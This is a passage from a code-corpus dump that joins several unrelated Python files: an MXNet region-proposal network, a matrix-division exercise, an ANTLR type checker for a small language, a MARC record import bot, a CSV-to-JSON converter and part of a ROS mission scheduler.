1), in_channels=64, activation='relu')\n self.pool1 = mx.gluon.nn.MaxPool2D(pool_size=(2,2), strides=(2,2), padding=0, ceil_mode=False)\n\n self.conv2_1 = mx.gluon.nn.Conv2D(channels=128, kernel_size=(3, 3), strides=(1, 1), padding=(1, 1), in_channels=64, activation='relu')\n self.conv2_2 = mx.gluon.nn.Conv2D(channels=128, kernel_size=(3, 3), strides=(1, 1), padding=(1, 1), in_channels=128, activation='relu')\n self.pool2 = mx.gluon.nn.MaxPool2D(pool_size=(2,2), strides=(2,2), padding=0, ceil_mode=False)\n\n self.conv3_1 = mx.gluon.nn.Conv2D(channels=256, kernel_size=(3, 3), strides=(1, 1), padding=(1, 1), in_channels=128, activation='relu')\n self.conv3_2 = mx.gluon.nn.Conv2D(channels=256, kernel_size=(3, 3), strides=(1, 1), padding=(1, 1), in_channels=256, activation='relu')\n self.conv3_3 = mx.gluon.nn.Conv2D(channels=256, kernel_size=(3, 3), strides=(1, 1), padding=(1, 1), in_channels=256, activation='relu')\n self.pool3 = mx.gluon.nn.MaxPool2D(pool_size=(2,2), strides=(2,2), padding=0, ceil_mode=False)\n\n self.conv4_1 = mx.gluon.nn.Conv2D(channels=512, kernel_size=(3, 3), strides=(1, 1), padding=(1, 1), in_channels=256, activation='relu')\n self.conv4_2 = mx.gluon.nn.Conv2D(channels=512, kernel_size=(3, 3), strides=(1, 1), padding=(1, 1), in_channels=512, activation='relu')\n self.conv4_3 = mx.gluon.nn.Conv2D(channels=512, kernel_size=(3, 3), strides=(1, 1), padding=(1, 1), in_channels=512, activation='relu')\n self.pool4 = mx.gluon.nn.MaxPool2D(pool_size=(2,2), strides=(2,2), padding=0, ceil_mode=False)\n \n self.conv5_1 = mx.gluon.nn.Conv2D(channels=512, kernel_size=(3, 3), strides=(1, 1), padding=(1, 1), in_channels=512, activation='relu')\n self.conv5_2 = mx.gluon.nn.Conv2D(channels=512, kernel_size=(3, 3), strides=(1, 1), padding=(1, 1), in_channels=512, activation='relu')\n self.conv5_3 = mx.gluon.nn.Conv2D(channels=512, kernel_size=(3, 3), strides=(1, 1), padding=(1, 1), in_channels=512, activation='relu')\n\n def init_by_vgg(self, ctx):\n self.collect_params().initialize(mx.init.Normal(), ctx=ctx)\n vgg16 = mx.gluon.model_zoo.vision.vgg16(pretrained=True)\n setConvWeights(self.conv1_1, vgg16.features[0])\n setConvWeights(self.conv1_2, vgg16.features[2])\n setConvWeights(self.conv2_1, vgg16.features[5])\n setConvWeights(self.conv2_2, vgg16.features[7])\n setConvWeights(self.conv3_1, vgg16.features[10])\n setConvWeights(self.conv3_2, vgg16.features[12])\n setConvWeights(self.conv3_3, vgg16.features[14])\n setConvWeights(self.conv4_1, vgg16.features[17])\n setConvWeights(self.conv4_2, vgg16.features[19])\n setConvWeights(self.conv4_3, vgg16.features[21])\n setConvWeights(self.conv5_1, vgg16.features[24])\n setConvWeights(self.conv5_2, vgg16.features[26])\n setConvWeights(self.conv5_3, vgg16.features[28])\n\n def forward(self, x, *args):\n features = []\n f = self.conv1_1(x)\n f = self.conv1_2(f)\n f = self.pool1(f)\n \n f = self.conv2_1(f)\n f = self.conv2_2(f)\n f = self.pool2(f)\n\n f = self.conv3_1(f)\n f = self.conv3_2(f)\n f = self.conv3_3(f)\n f = self.pool3(f)\n\n f = self.conv4_1(f)\n f = self.conv4_2(f)\n f = self.conv4_3(f)\n f = self.pool4(f)\n f = self.conv5_1(f)\n f = self.conv5_2(f)\n f = self.conv5_3(f)\n return f\n\n\nclass DetectorHead(mx.gluon.Block):\n def __init__(self, num_anchors, **kwargs):\n super(DetectorHead, self).__init__(**kwargs)\n self.conv1 = mx.gluon.nn.Conv2D(channels=512, kernel_size=(3, 3), padding=(1,1), activation='relu', weight_initializer=mx.init.Normal(0.01))\n self.conv_cls = mx.gluon.nn.Conv2D(channels=2*num_anchors, kernel_size=(1, 1),padding=(0, 0), weight_initializer=mx.init.Normal(0.01))\n self.conv_reg = mx.gluon.nn.Conv2D(channels=4*num_anchors, kernel_size=(1, 1), padding=(0, 0), weight_initializer=mx.init.Normal(0.01))\n \n def forward(self, feature, *args):\n f = self.conv1(feature)\n f_cls = self.conv_cls(f)\n f_reg = self.conv_reg(f)\n return f_cls, f_reg\n\n def init_params(self, ctx):\n self.collect_params().initialize(ctx=ctx)\n\n\nclass RPNBlock(mx.gluon.Block):\n def __init__(self, num_anchors, **kwargs):\n super(RPNBlock, self).__init__(**kwargs)\n self.feature_exactor = RPNFeatureExtractor()\n self.head = DetectorHead(num_anchors)\n \n def forward(self, data, *args):\n f = self.feature_exactor(data)\n f_cls, f_reg = self.head(f)\n return f_cls, f_reg, f\n \n def init_params(self, ctx):\n self.feature_exactor.init_by_vgg(ctx)\n self.head.init_params(ctx)\n","sub_path":"rpn.py","file_name":"rpn.py","file_ext":"py","file_size_in_byte":5481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"213331932","text":"#!/usr/bin/python3\ndef matrix_divided(matrix, div):\n result = []\n result2 = []\n lengths = []\n if type(div) == type(1) or type(div) == 1.0:\n if int(div) == 0:\n raise ZeroDivisionError(\"division by zero\")\n else:\n raise TypeError(\"div must be a number\")\n for x in matrix:\n lengths.append(len(x))\n if type(x) != list:\n raise TypeError(\"matrix must be a matrix (list of lists) \\\nof integers/floats\")\n if(len(set(lengths)) != 1):\n raise TypeError(\"Each row of the matrix must have the same size\")\n for i in matrix:\n for j in i:\n if not type(j) == type(1) and not type(j) == type(1.0):\n raise TypeError(\"matrix must be a matrix (list of lists) \\\nof integers/floats\")\n result.append(round(j / div, 2))\n result2.append(result)\n result = []\n return result2\n","sub_path":"0x07-python-test_driven_development/2-matrix_divided.py","file_name":"2-matrix_divided.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"367449800","text":"from antlr4 import *\nfrom SimpleCodeLexer import SimpleCodeLexer\nfrom SimpleCodeListener import SimpleCodeListener\nfrom SimpleCodeParser import SimpleCodeParser\nfrom SimpleCodeVisitor import SimpleCodeVisitor\nimport sys\nfrom antlr4.tree.Tree import TerminalNodeImpl, ErrorNodeImpl\nfrom antlr4.error.ErrorListener import ErrorListener\nfrom antlr4.error.Errors import RecognitionException, NoViableAltException, InputMismatchException, FailedPredicateException, ParseCancellationException\n\nfilterList = ['IDENTIFIER', 'INTLITERAL',\n 'CHARLITERAL', 'STRINGLITERAL', 'BOOLEANLITERAL']\n\nfWrite = open(sys.argv[1] + '.out', 'w')\n\ndef printOutChildNode(child, lexers):\n global filterList, fWrite\n line = child.getSymbol().line\n lexer = child.getText()\n token = lexers.ruleNames[child.getSymbol().type - 1]\n if (token in filterList):\n fWrite.write('{0} {1} {2}\\n'.format(line, token, lexer))\n else:\n fWrite.write('{0} {1}\\n'.format(line, lexer))\n\n\ndef flattenTree(parent, lexers):\n if (int(sys.argv[1]) == 1):\n return\n for i in range(parent.getChildCount()):\n child = parent.getChild(i)\n # if (not isinstance(child, ErrorNodeImpl)):\n if (isinstance(child, TerminalNodeImpl)) and (child.getText().strip() != ''):\n printOutChildNode(child, lexers)\n else:\n flattenTree(child, lexers)\n\n\nclass MyErrorListener(ErrorListener):\n def __init__(self):\n super(MyErrorListener, self).__init__()\n\n def printSyntaxError(self, msg, line, column):\n if not msg.find(\"' '\"):\n fWrite.write(\n '[Syntax Error] Line {0}, column {1}: {2}\\n'.format(line, column, msg))\n\n def escapeWSAndQuote(self, s: str):\n s = s.replace(\"\\n\", \"\\\\n\")\n s = s.replace(\"\\r\", \"\\\\r\")\n s = s.replace(\"\\t\", \"\\\\t\")\n return \"'\" + s + \"'\"\n\n def getTokenErrorDisplay(self, t: Token):\n if t is None:\n return \"\"\n s = t.text\n if s is None:\n if t.type == Token.EOF:\n s = \"\"\n else:\n s = \"<\" + str(t.type) + \">\"\n return self.escapeWSAndQuote(s)\n\n def reportNoViableAlternative(self, recognizer: Parser, e: NoViableAltException, line, column):\n tokens = recognizer.getTokenStream()\n if tokens is not None:\n if e.startToken.type == Token.EOF:\n input = \"\"\n else:\n input = tokens.getText()\n else:\n input = \"\"\n if (input.strip() != ''):\n msg = 'No viable alternative at input {0}'.format(\n self.escapeWSAndQuote(input))\n self.printSyntaxError(msg, line, column)\n\n def reportInputMismatch(self, recognizer: Parser, e: InputMismatchException, line, column):\n msg = \"Mismatched input {0}. Expected {1}\".format(self.getTokenErrorDisplay(\n e.offendingToken), e.getExpectedTokens().toString(recognizer.literalNames, recognizer.symbolicNames))\n self.printSyntaxError(msg, line, column)\n\n def reportFailedPredicate(self, recognizer, e, line, column):\n ruleName = recognizer.ruleNames[recognizer._ctx.getRuleIndex()]\n msg = \"Following Rule is error: {0}. Message: {1}\".format(\n ruleName, e.message)\n self.printSyntaxError(msg, line, column)\n\n def syntaxError(self, recognizer, offendingSymbol, line, column, msg, e):\n if isinstance(e, NoViableAltException):\n self.reportNoViableAlternative(recognizer, e, line, column)\n elif isinstance(e, InputMismatchException):\n self.reportInputMismatch(recognizer, e, line, column)\n elif isinstance(e, FailedPredicateException):\n self.reportFailedPredicate(recognizer, e, line, column)\n else:\n self.printSyntaxError(msg, line, column)\n\n\nERROR_DUPLICATE_VAR_DEFINE = 'Variable [{0}] is already declared with type [{1}]\\n'\nERROR_VAR_NOT_DEFINED = 'Variable [{0}] has not been defined\\n'\nERROR_VAR_EXCUTE_AS_FUNCTION = 'Variable [{0}] is not a function\\n'\nERROR_DATA_TYPE_NOT_COMPATIBLE_OPERATOR = 'Type [{0}] is not compatible with operator [{1}]\\n'\nERROR_DATA_TYPE_DIFFERENT = \"Right hand side should be type [{0}], got type [{1}]\\n\"\nMAIN_METHOD_IS_NOT_AVAILABLE = \"There is no 'main' method is declared\\n\"\nERROR_ARRAY_ZERO_LENGTH = \"Array [{0}] is declared with zero-size\\n\"\nERROR_ARRAY_LENGTH_NOT_DEFINED = \"Array [{0}] is declared with wrong size\\n\"\nFUNCTION_NOT_DEFINED = \"Function [{0}] is not defined!\\n\"\nFUNCTION_PARAMS_MISMATCHED = \"Function [{0}] requires list parameters as {1}, which is actually as {2}\\n\"\nERROR_VOID_RETURN_DATA_TYPE = \"Void [{0}] can't return value, got type [{1}]\\n\"\nERROR_FUNCTION_RETURN_WRONG_TYPE = \"Function [{0}] expected return type as [{1}], got [{2}]\\n\"\nERROR_FUNCTION_RETURN_EMPTY = \"Function [{0}] expected return type as [{1}], got empty\\n\"\nERROR_ARRAY_INDEX_TYPE = \"Array [{0}] index type must be [int], got [{1}]\\n\"\nERROR_ARRAY_INDEX_UNDEFINED = \"Array [{0}] must have index, but got empty\\n\"\nERROR_RHS_IS_ARRAY = \"Right hand side of assignment must not be {0}\\n\"\nERROR_ARRAY_INDEX_OUT_OF_RANGE = \"Array [{0}] index is out of range, must be non-negative and less than [{1}], actually [{2}]\\n\"\nERROR_VAR_IS_NOT_ARRAY = \"[{0}] is not an array to iterate\\n\"\nERROR_IF_CONDITION_MUST_BE_BOOLEAN = 'Condition in if-else must be [boolean], got [{0}]\\n'\nERROR_ITERATOR_LOOP_NOT_INT = 'Iterator in Loop must be int-variable, got [{0}]\\n'\nERROR_MISSING_IDENTIFIER_FOR = 'For-loop is missing iterator\\n'\nERROR_PARAMS_FOR = 'For-loop got {0} param(s), expected 3\\n'\nERROR_INIT_VALUE_FOR = 'For-loop must have initialized value int-type, got [{0}]\\n'\nERROR_FINAL_VALUE_FOR = 'For-loop must have final value int-type, got [{0}]\\n'\nERROR_OPERATOR_MISMATCHED = \"Type [{0}] and type [{1}] couldn't operate with [{2}]\\n\"\nERROR_NOT_OPERATOR_POSTFIX = '[!] operator requires boolean variable, got [{0}]\\n'\nERROR_SUB_OPERATOR_POSTFIX = '[-] operator requires int variable, got [{0}]\\n'\nINT_TYPE = 'int'\nBOOL_TYPE = 'boolean'\nARRAY_TYPE = 'array[{0}]'\n\nVOID = 'void'\n\ndef checkTypeCompatible(op, dataType):\n if op.strip() == '=':\n return True\n\n if op.strip() in ['+=', '-=', '+', '-', '*', '/', '%', '<','>', '<=', '>=']:\n return dataType == INT_TYPE\n\n return dataType == BOOL_TYPE\n\ndef getTypeFromOperator(op):\n if op.strip() in ['+', '-', '*', '/', '%']:\n return INT_TYPE\n return BOOL_TYPE\n\ndef checkValidOperation(op, x, y):\n if op.strip() in ['!=', '==']:\n return x == y\n\n if op.strip() in ['+', '-', '*', '/', '%', '<', '>', '<=', '>=']:\n return (x == INT_TYPE) and (y == INT_TYPE)\n\n return (x == BOOL_TYPE) and (y == BOOL_TYPE)\n\nclass MyVisitor(SimpleCodeVisitor):\n def __init__(self, lexer, fWrite):\n self.table = {}\n self.funcTable = {}\n self.arrayTable = {}\n self.lexer = lexer\n self.fWrite = fWrite\n\n def printError(self, ctx, errorMsg, *args):\n if ctx is not None:\n self.fWrite.write('Error at line {0}, column {1} : {2}'.format(ctx.start.line, ctx.start.column, errorMsg.format(*args)))\n else:\n self.fWrite.write('Error at line 0, column 0 : {0}'.format(errorMsg.format(*args)))\n\n def visitField_decl(self, ctx:SimpleCodeParser.Field_declContext):\n dataType = ctx.DATA_TYPE().getText()\n for i in range(ctx.getChildCount()):\n child = ctx.getChild(i)\n if (not isinstance(child, TerminalNodeImpl)) and (child.getText().strip() != ''):\n id = self.visit(child).getText()\n if id in self.table:\n self.printError(ctx, ERROR_DUPLICATE_VAR_DEFINE, id, self.table[id])\n else:\n self.table[id] = dataType\n\n\n def visitMethod_decl(self, ctx:SimpleCodeParser.Method_declContext):\n declarationType = ctx.method_decl_type().getText()\n methodName = ctx.IDENTIFIER().getText()\n if (ctx.method_params()):\n self.funcTable[methodName] = self.visit(ctx.method_params())\n else:\n self.funcTable[methodName] = []\n\n if methodName in self.table:\n if self.table[methodName] != declarationType:\n self.printError(ctx, ERROR_DUPLICATE_VAR_DEFINE, methodName, self.table[methodName])\n else:\n self.table[methodName] = declarationType\n \n listReturned = self.visit(ctx.block())\n\n for child in listReturned:\n returnType = VOID\n if len(child.expr()) > 0:\n returnType = self.visit(child.expr()[0])\n if returnType != declarationType:\n if declarationType == VOID:\n self.printError(child, ERROR_VOID_RETURN_DATA_TYPE, methodName, returnType)\n elif returnType == VOID:\n self.printError(child, ERROR_FUNCTION_RETURN_EMPTY, methodName, declarationType)\n else:\n self.printError(child, ERROR_FUNCTION_RETURN_WRONG_TYPE, methodName, declarationType, returnType)\n\n\n def visitMethod_params(self, ctx:SimpleCodeParser.Method_paramsContext):\n listParams = [id.getText() for id in ctx.DATA_TYPE()]\n # print(ctx.DATA_TYPE())\n return listParams\n\n def visitVariable(self, ctx:SimpleCodeParser.VariableContext):\n if ctx.IDENTIFIER() is not None:\n return ctx.IDENTIFIER()\n return self.visitChildren(ctx)\n \n def visitArray_decl(self, ctx:SimpleCodeParser.Array_declContext):\n if isinstance(ctx.INTLITERAL(), ErrorNodeImpl):\n self.printError(ctx, ERROR_ARRAY_LENGTH_NOT_DEFINED, ctx.IDENTIFIER().getText())\n elif ctx.INTLITERAL().getText() == '0':\n self.printError(ctx, ERROR_ARRAY_ZERO_LENGTH, ctx.IDENTIFIER().getText())\n else:\n # Everything ok\n self.arrayTable[ctx.IDENTIFIER().getText()] = int(ctx.INTLITERAL().getText())\n return ctx.IDENTIFIER()\n\n def visitAssign_statement(self, ctx:SimpleCodeParser.Assign_statementContext):\n lhs = self.visit(ctx.location())\n op = ctx.assign_op().getText()\n rhs = self.visit(ctx.expr())\n \n if not self.table.get(lhs):\n self.printError(ctx, ERROR_VAR_NOT_DEFINED, lhs)\n return\n \n if not checkTypeCompatible(op, self.table[lhs]):\n self.printError(ctx, ERROR_DATA_TYPE_NOT_COMPATIBLE_OPERATOR, self.table[lhs], op)\n return\n\n if (rhs in [INT_TYPE, BOOL_TYPE]) and (not checkTypeCompatible(op, rhs)):\n self.printError(ctx, ERROR_DATA_TYPE_NOT_COMPATIBLE_OPERATOR, rhs, op)\n return\n\n lhsType = self.table.get(lhs)\n rhsType = rhs\n\n if rhsType not in [INT_TYPE, BOOL_TYPE]:\n rhsType = self.table.get(rhs)\n\n if not rhsType:\n self.printError(ctx, ERROR_VAR_NOT_DEFINED, rhs)\n return\n \n if lhsType != rhsType:\n self.printError(ctx, ERROR_DATA_TYPE_DIFFERENT, lhsType, rhsType)\n \n rhsArrayCheck = self.arrayTable.get(rhs)\n if rhsArrayCheck:\n arrayType = ARRAY_TYPE.format(self.table[rhs])\n self.printError(ctx, ERROR_RHS_IS_ARRAY, arrayType) \n \n def visitLiteral(self, ctx:SimpleCodeParser.LiteralContext):\n if (ctx.INTLITERAL()):\n return INT_TYPE\n if (ctx.BOOLEANLITERAL()):\n return BOOL_TYPE\n return self.visitChildren(ctx)\n\n def visitLocation(self, ctx:SimpleCodeParser.LocationContext):\n varName = ctx.IDENTIFIER().getText()\n # Check if Array\n if ctx.expr():\n arrSize = self.arrayTable.get(varName)\n\n if not arrSize:\n # Not array!\n self.printError(ctx, ERROR_VAR_IS_NOT_ARRAY, varName)\n return varName\n\n idxType = self.visit(ctx.expr())\n\n if idxType not in [INT_TYPE, BOOL_TYPE, None]:\n idxType = self.table.get(idxType)\n \n \n if not idxType:\n self.printError(ctx, ERROR_ARRAY_INDEX_UNDEFINED, varName)\n elif idxType != INT_TYPE:\n self.printError(ctx, ERROR_ARRAY_INDEX_TYPE, varName, idxType)\n else:\n idx = int(ctx.expr().getText())\n if idx >= arrSize or idx < 0:\n self.printError(ctx, ERROR_ARRAY_INDEX_OUT_OF_RANGE, varName, arrSize, idx)\n return varName\n\n def visitMethod_call(self, ctx:SimpleCodeParser.Method_callContext):\n if ctx.CALLOUT() is None:\n funcName = ctx.method_name().getText()\n if not self.table.get(funcName):\n self.printError(ctx, FUNCTION_NOT_DEFINED, funcName)\n return None\n if not self.funcTable.get(funcName):\n self.printError(ctx, ERROR_VAR_EXCUTE_AS_FUNCTION, funcName)\n return None\n\n listParams = []\n if ctx.method_call_params():\n listParams = self.visit(ctx.method_call_params())\n \n if listParams is not None:\n requiredParams = self.funcTable[funcName]\n if requiredParams != listParams: \n self.printError(ctx, FUNCTION_PARAMS_MISMATCHED, funcName, requiredParams, listParams) \n \n return self.table.get(funcName)\n\n self.visitChildren(ctx)\n\n def visitExpr(self, ctx:SimpleCodeParser.ExprContext):\n if (ctx.location()):\n return self.visit(ctx.location())\n if (ctx.literal()):\n return self.visit(ctx.literal())\n if (ctx.method_call()):\n return self.visit(ctx.method_call())\n if (ctx.BINARY_OP()):\n x = self.visit(ctx.expr()[0])\n y = self.visit(ctx.expr()[1])\n if x not in [INT_TYPE, BOOL_TYPE]:\n if not self.table.get(x):\n self.printError(ctx, ERROR_VAR_NOT_DEFINED, x)\n else:\n if self.arrayTable.get(x):\n x = ARRAY_TYPE.format(self.table[x])\n else:\n x = self.table[x]\n\n if y not in [INT_TYPE, BOOL_TYPE]:\n if not self.table.get(y):\n self.printError(ctx, ERROR_VAR_NOT_DEFINED, y)\n else:\n if self.arrayTable.get(y):\n y = ARRAY_TYPE.format(self.table[y])\n else:\n y = self.table[y]\n \n op = ctx.BINARY_OP().getText()\n opType = getTypeFromOperator(op)\n\n if not checkValidOperation(op, x, y):\n self.printError(ctx, ERROR_OPERATOR_MISMATCHED, x, y, op)\n \n return opType\n \n prefix = ctx.getChild(0).getText()\n\n if prefix == '!':\n id = ctx.expr()[0].getText().strip()\n if id == '':\n self.printError(ctx, ERROR_NOT_OPERATOR_POSTFIX, None)\n else:\n id = self.visit(ctx.expr()[0])\n idType = id\n if id not in [BOOL_TYPE, INT_TYPE]:\n if not self.table.get(id):\n self.printError(ctx, ERROR_VAR_NOT_DEFINED, id)\n return BOOL_TYPE\n idType = self.table[id] \n if idType != BOOL_TYPE:\n if (id == INT_TYPE) or (idType == INT_TYPE):\n self.printError(ctx, ERROR_NOT_OPERATOR_POSTFIX, INT_TYPE)\n return BOOL_TYPE\n if self.arrayTable.get(id):\n idType = ARRAY_TYPE.format(idType)\n self.printError(ctx, ERROR_NOT_OPERATOR_POSTFIX, idType)\n return BOOL_TYPE\n return BOOL_TYPE\n \n \n if prefix == '-':\n id = ctx.expr()[0].getText().strip()\n if id == '':\n self.printError(ctx, ERROR_SUB_OPERATOR_POSTFIX, None)\n else:\n id = self.visit(ctx.expr()[0])\n idType = id\n if id not in [BOOL_TYPE, INT_TYPE]:\n if not self.table.get(id):\n self.printError(ctx, ERROR_VAR_NOT_DEFINED, id)\n return INT_TYPE\n idType = self.table[id] \n if idType != INT_TYPE:\n if (id == BOOL_TYPE) or (idType == BOOL_TYPE):\n self.printError(ctx, ERROR_SUB_OPERATOR_POSTFIX, BOOL_TYPE)\n return INT_TYPE\n if self.arrayTable.get(id):\n idType = ARRAY_TYPE.format(idType)\n self.printError(ctx, ERROR_SUB_OPERATOR_POSTFIX, idType)\n return INT_TYPE\n return self.visitChildren(ctx)\n\n def visitMethod_call_params(self, ctx:SimpleCodeParser.Method_call_paramsContext):\n listParams = []\n for _ in ctx.expr():\n id = self.visitExpr(_)\n\n if id in [INT_TYPE, BOOL_TYPE]:\n listParams.append(id)\n continue\n\n if not self.table.get(id):\n self.printError(ctx, ERROR_VAR_NOT_DEFINED, id)\n return None\n listParams.append(self.table[id])\n\n return listParams\n\n def visitBlock(self, ctx:SimpleCodeParser.BlockContext):\n self.visitChildren(ctx)\n listReturned = []\n for _ in ctx.statement():\n if _.RETURN() is not None:\n listReturned.append(_)\n return listReturned\n \n def visitStatement(self, ctx:SimpleCodeParser.StatementContext):\n if (ctx.IF()):\n idx = self.visit(ctx.expr()[0])\n if idx not in [INT_TYPE, BOOL_TYPE, None]:\n idx = self.table.get(idx)\n if idx != BOOL_TYPE:\n self.printError(ctx, ERROR_IF_CONDITION_MUST_BE_BOOLEAN, idx)\n \n if (ctx.FOR()):\n idx = ctx.IDENTIFIER()\n\n if idx is None:\n self.printError(ctx, ERROR_MISSING_IDENTIFIER_FOR)\n return self.visitChildren(ctx)\n \n idx = idx.getText()\n idxType = self.table.get(idx)\n if idxType not in [INT_TYPE, None]:\n self.printError(ctx, ERROR_ITERATOR_LOOP_NOT_INT, idxType)\n else:\n isArray = self.arrayTable.get(idx)\n if isArray:\n self.printError(ctx, ERROR_ITERATOR_LOOP_NOT_INT, ARRAY_TYPE.format(idxType))\n \n listForParams = ctx.expr()\n if len(listForParams) != 2:\n self.printError(ctx, ERROR_PARAMS_FOR, len(listForParams) + 1)\n return self.visitChildren(ctx)\n \n initValueType = self.visit(listForParams[0])\n if initValueType != INT_TYPE:\n self.printError(ctx, ERROR_INIT_VALUE_FOR, initValueType)\n \n finalValueType = self.visit(listForParams[1])\n if finalValueType != INT_TYPE:\n self.printError(ctx, ERROR_FINAL_VALUE_FOR, finalValueType)\n \n\n return self.visitChildren(ctx)\n\ndef main(argv):\n input_stream = FileStream(argv[1])\n lexer = SimpleCodeLexer(input_stream)\n stream = CommonTokenStream(lexer)\n parser = SimpleCodeParser(stream)\n parser._listeners = [MyErrorListener()]\n tree = parser.program()\n visitor = MyVisitor(lexer, fWrite)\n visitor.visit(tree)\n # Check for main method\n if not visitor.table.get('main'):\n visitor.printError(None, MAIN_METHOD_IS_NOT_AVAILABLE)\n # flattenTree(tree, lexer)\n print(visitor.table)\n print(visitor.funcTable)\n print(visitor.arrayTable)\nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":19994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"112265386","text":"\"\"\"\n eccobots.py - MARC Bots for ECCO MARC files\n\"\"\"\n__author__ = 'Jeremy Nelson'\n\nfrom marcbots import MARCImportBot\n\nPROXY_LOCATION = '0-galenet.galegroup.com.tiger.coloradocollege.edu'\n\nclass ECCOBot(MARCImportBot):\n ''' Class reads Eighteenth Century Collections Online (ECCO) MARC file,\n validates and adds/modifies fields, and generates a MARC file for\n importing into TIGER.'''\n\n def __init__(self,\n marc_file):\n ''' \n Creates instance of bot for creating valid MARC record for\n importing into TIGER from ECCO MARC file.\n\n :param marc_file:file location for ECCO MARC file\n '''\n self.series_statement = 'Eighteenth century collections online'\n MARCImportBot.__init__(self,marc_file)\n\n def processRecord(self,marc_record):\n '''\n Call-back method for specific Gale ECCO validation and\n processing.\n \n :param marc_record: MARC record, required\n '''\n marc_record = self.validate001(marc_record)\n marc_record = self.validate490(marc_record)\n marc_record = self.validate830(marc_record)\n marc_record = self.processURLs(marc_record,\n proxy_location=PROXY_LOCATION)\n return marc_record\n\n def validate001(self,marc_record):\n ''' Method sets 001 Control Number of CC's format.\n\n :param marc_record: MARC record, required\n args:\n marc_record -- MARC record\n '''\n field001 = marc_record.get_fields('001')[0]\n marc_record.remove_field(field001)\n raw_data = field001.data\n field001.data = 'ESTC%s' % raw_data\n marc_record.add_field(field001)\n return marc_record\n\n def validate490(self,marc_record):\n \"\"\"\n Method adds/sets 490 field with series statement.\n\n :param marc_record: MARC record, required\n \"\"\"\n all490s = marc_record.get_fields('490')\n if len(all490s) > 0:\n for field in all490s:\n marc_record.remove_field(field)\n if field.get_subfields('a')[0] != self.series_statement:\n field.delete_subfield('a')\n field.add_subfield('a',self.series_statement)\n field.indicators = None\n field.indicators = ['1','\\\\']\n marc_record.add_field(field)\n else:\n field490 = Field(tag='490',\n indicators=['1','\\\\'],\n subfields=['a',self.series_statement])\n marc_record.add_field(field490)\n return marc_record\n\n def validate830(self,marc_record):\n \"\"\"\n Method adds/sets 830 field with series statement.\n\n Parameters:\n - `marc_record`: MARC record \n \"\"\"\n all830s = marc_record.get_fields('830')\n if len(all830s) > 0:\n for field830 in all830s:\n marc_record.remove_field(field830)\n if field830.get_subfields('a')[0] != self.series_statement:\n field830.delete_subfield('a')\n field830.add_subfield('a',self.series_statement)\n field830.indicators = ['\\\\','0']\n marc_record.add_field(field830)\n else:\n field830 = Field(tag='830',\n indicators=['\\\\','0'],\n subfields=['a',self.series_statement])\n marc_record.add_field(field830)\n return marc_record\n","sub_path":"aristotle/apps/marc/bots/eccobots.py","file_name":"eccobots.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"121292828","text":"import json \nclublist =[]\nwith open(\"csvdata.txt\",\"r\") as inp:\n for f in inp.readlines():\n team,city,country = f.strip().split(',')\n data = {\n \"team\" : team,\n \"city\" : city,\n \"country\" : country\n }\n print(f\"{team} -> {city} -> {country}\")\n clublist.append(data)\n\nwith open(\"writecsvtojson.txt\",\"w\") as op:\n json.dump(clublist,op)\n \n","sub_path":"convertcsvtojson.py","file_name":"convertcsvtojson.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"538763447","text":"#!/usr/bin/python\n\nimport os\nfrom collections import OrderedDict\nimport json\n\nimport rospy\nimport rospkg\nfrom geometry_msgs.msg import Vector3Stamped\nfrom visualization_msgs.msg import Marker, MarkerArray\n\nfrom last_letter_msgs.msg import Parameter\nimport uav_ftc.fault_generator as fg\n\nclass Scheduler:\n\n scenario = None\n pending_item = None\n reference = None\n wp_list = None\n wp_count = 0\n timestamp = None\n end_reached = False\n start_time = None\n relative_time = False\n\n def __init__(self, scenario_file):\n self.start_time = rospy.Time.now() # Store initialization instance\n self.ref_rates_pub = rospy.Publisher('refRates', Vector3Stamped, queue_size=10) # Setup rates reference publisher\n self.ref_traj_pub = rospy.Publisher('refTrajectory', Vector3Stamped, queue_size=10) # Setup trajectory reference publisher\n self.ref_wp_pub = rospy.Publisher('waypoints', MarkerArray, queue_size=10) # Setup waypoint reference publisher\n # Setup fault publisher\n self.fg = fg.FaultGenerator()\n self.fault_pub = rospy.Publisher('parameter_changes', Parameter, queue_size=100)\n\n with open(scenario_file) as fh:\n try:\n json_dict = json.load(fh, object_pairs_hook=OrderedDict)\n except ValueError as e:\n rospy.logerr('Malformed json scenario file')\n\n self.reference = Vector3Stamped()\n self.wp_list = MarkerArray()\n\n self.scenario = json_dict\n # Read if there is a relative_time specification\n self.relative_time = self.scenario.pop('relative_time', False)\n if self.relative_time:\n rospy.loginfo('Mission specified relative timing')\n\n try:\n self.popitem()\n except StopIteration:\n self.end_reached = True\n\n def check_time(self):\n now = rospy.Time.now()\n if self.relative_time:\n time = now - self.start_time\n else:\n time = now\n # print('Time: {}'.format(time.secs))\n\n if self.pending_item['time'] <= time.secs:\n self.parse_next_point()\n\n def parse_next_point(self):\n # Apply the reference\n try:\n self.parse_point(self.pending_item)\n except AttributeError as e:\n print(e)\n # Pop the next item\n try:\n self.popitem()\n except StopIteration:\n self.end_reached = True\n\n def parse_point(self, ref_item):\n for attribute, value in ref_item.iteritems():\n if attribute == 'time':\n # set the timestamp\n self.timestamp = rospy.Time.now()\n continue\n\n if attribute == 'angular_rates':\n # Read and publish a new reference rates tuple\n rospy.loginfo('Publishing new reference rates')\n for ref_type, ref_value in value.iteritems():\n if ref_type == 'p':\n v_attr_name = 'x'\n elif ref_type == 'q':\n v_attr_name = 'y'\n elif ref_type == 'r':\n v_attr_name = 'z'\n else:\n raise AttributeError('Invalid reference attribute {}'.format(ref_type))\n setattr(self.reference.vector, v_attr_name, ref_value)\n rospy.loginfo(\"New reference:\\n {}\".format(self.reference))\n self.reference.header.stamp = self.timestamp\n self.ref_rates_pub.publish(self.reference)\n\n if attribute == 'trajectory':\n # Read and publish a new reference trajectory\n rospy.loginfo('Publishing new reference trajectory')\n for ref_type, ref_value in value.iteritems():\n if ref_type == 'airspeed':\n v_attr_name = 'x'\n elif ref_type == 'gamma':\n 